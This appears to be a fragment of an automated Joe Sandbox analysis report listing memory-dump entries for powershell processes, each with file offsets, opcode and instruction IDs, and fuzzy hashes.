                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF01A73020CB0C4FDB44EF0CE451AA6B3E0FB85320F10052DE58AC3691DA32E882CB41
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8b6c3dcc2e27ef5c70102c53c0f78f1ce8be5268cca69b9ad98c99e16bd86974
                                                                                                                                                                                                                                        • Instruction ID: a7ad461b245ea3eea94270617697978dc39505dbace056c156fd682d150d0bf1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b6c3dcc2e27ef5c70102c53c0f78f1ce8be5268cca69b9ad98c99e16bd86974
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F024308086898FDB06DF288C669D97FE0FF17210B0402ABE458C70E2DB75A458CBC2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0c6c6d51f38850b5b295c4e475ae16963c1e53341b0a139683ad1c9c59f6e878
                                                                                                                                                                                                                                        • Instruction ID: 4f8aeab93b06df4974bde12642563280499731a59ff315909efd0cc60f9fea64
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c6c6d51f38850b5b295c4e475ae16963c1e53341b0a139683ad1c9c59f6e878
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BF0E232B0D6048FDBA8EB8CE450AA873E0EF0532071500B6E41DDB5A7CA25EC80C740
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2140338257.00007FFD93950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93950000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93950000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3832195a35ec864bac7ea5a6594e052b9454044214fdadb45c7cee34cd866b91
                                                                                                                                                                                                                                        • Instruction ID: f5a0b96d94e3bc8124be9e8370ac6cf3df8e19773ed4a37a86966e45dc9e9ef7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3832195a35ec864bac7ea5a6594e052b9454044214fdadb45c7cee34cd866b91
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E0653170C5158FD668DA4CF445AE873E0EF443317104166D51DD7166CA22EC92C780
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: N_^?$N_^@$N_^K$N_^N$N_^T$N_^Y
                                                                                                                                                                                                                                        • API String ID: 0-2010414532
                                                                                                                                                                                                                                        • Opcode ID: 319b4c4fdf117597eb9eb8f7e12cbd45a26e74fdd2716d7bc6bf197e8ffd1363
                                                                                                                                                                                                                                        • Instruction ID: c65ba2afff7e96ef9c8e14db0ab8d28a186a026ef0d790d07db6795f0496346a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 319b4c4fdf117597eb9eb8f7e12cbd45a26e74fdd2716d7bc6bf197e8ffd1363
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1921F367B088264BD30236BDBC25AE86795DF9437A74401B3D368CF593DC58B48787E1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                        • API String ID: 0-2528851458
                                                                                                                                                                                                                                        • Opcode ID: c06112db0507e13e16df139322ba366c7ccd41b760008bb17600754ae58bb14a
                                                                                                                                                                                                                                        • Instruction ID: 22ef1dd95aecefec8bb56ea46720c27a06331828bd98d4e88fbaa9180ed7efce
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c06112db0507e13e16df139322ba366c7ccd41b760008bb17600754ae58bb14a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06413567E0F6D60FE7678BA81C790952FA49F1225870901FBC4F9AB0D3DE2A7C074251
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000019.00000002.2139674065.00007FFD93880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD93880000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_25_2_7ffd93880000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: N_^$N_^$N_^$N_^
                                                                                                                                                                                                                                        • API String ID: 0-3900292545
                                                                                                                                                                                                                                        • Opcode ID: 0526cf93592d6e015773004f98928ca0016230a6f1249b430e9173411d25f651
                                                                                                                                                                                                                                        • Instruction ID: 3f98ea48070b3909daec0fdb52dda76748cce566cb0f1fc004f5b5d66d9608b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0526cf93592d6e015773004f98928ca0016230a6f1249b430e9173411d25f651
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9C418462B0E6D30FE7635BA85CB60956FA4EF1225870901F6C0B99F1D3E9297C0742A2
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000004F.00000002.2291210886.00007FFD96380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96380000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_79_2_7ffd96380000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 443eeb7fa6fb45ecacbb0388913e2add407247ab497f673cf98b001699cf27f2
                                                                                                                                                                                                                                        • Instruction ID: 6d86c271e176f884d81605334afa34f22b5018d840469171499c5e60f5c8b48d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 443eeb7fa6fb45ecacbb0388913e2add407247ab497f673cf98b001699cf27f2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E91E431F0DA594FDB65EBACD8656EDBBE0EF55310F1840BED049DB293DA35A8028780
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2bcd9e1fc4b3139d958a21135da21476e9cddbe5c9c92620af7c235e65eaa2f8
                                                                                                                                                                                                                                        • Instruction ID: 0ea48bb2ce31d0d583f9c87647f504372e4cd512c4beea1b0b463dc24a755f5e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bcd9e1fc4b3139d958a21135da21476e9cddbe5c9c92620af7c235e65eaa2f8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E7410A32B1CA4E4FEBA59ADC64616B977D2EF84321B48017FD05FC3187EE28E8518341
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0a0e56c17b4e86ca812d6ee4d1d46db039ccd7202c08398ce9900fdb6e0474c7
                                                                                                                                                                                                                                        • Instruction ID: 323e0429369d0e3e723f9846c3e13b6f451c5396a32d7976f950683a5096d9a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a0e56c17b4e86ca812d6ee4d1d46db039ccd7202c08398ce9900fdb6e0474c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3410532B1CA5A0FEBB5A6EC54616B973D2EF84314B5801BBD45EC71C6EE1CAC018382
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6b49be84d3330b50719d8b4d42834379ad417f5e2df8914a605c65fd89af7fa7
                                                                                                                                                                                                                                        • Instruction ID: 0e3aba6768fd2ae91dd49e3e7de2b8cf2c6c02caf105b8c051a71bfcc21b9008
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b49be84d3330b50719d8b4d42834379ad417f5e2df8914a605c65fd89af7fa7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6018627F0E6DA0EE7B2B6E828351A86BC0DF56F61B1904BBD49CC71C3ED0968554392
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000004F.00000002.2291210886.00007FFD96380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96380000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_79_2_7ffd96380000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                        • Instruction ID: 628f72e5657e8cdcf696ae7e6903c59a51191ee5f0a20f47e3c9a8e88b909d2b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F701677121CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3695DA36E882CB45